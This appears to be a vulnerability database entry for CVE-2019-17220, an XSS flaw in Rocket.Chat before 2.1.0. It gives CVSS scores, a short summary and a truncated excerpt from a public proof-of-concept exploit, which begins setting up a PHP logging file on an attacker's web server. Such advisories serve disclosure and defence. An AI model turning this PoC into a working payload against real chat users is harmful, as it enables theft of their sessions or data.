4.3
CVSSv2

CVE-2019-17220

Published: 21/10/2019 Updated: 23/10/2019
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Rocket.Chat prior to 2.1.0 allows XSS via a URL on a ![title] line.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

rocket.chat rocket.chat

Exploits

# Title: RocketChat 210 - Cross-Site Scripting # Author: 3H34N # Date: 2019-10-22 # Product: RocketChat # Vendor: rocketchat/ # Vulnerable Version(s): RocketChat < 210 # CVE: CVE-2019-17220 # Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) # PoC # 1 Create l33tphp on a web server <?php $output = fopen("logs ...
RocketChat version 210 suffers from a cross site scripting vulnerability ...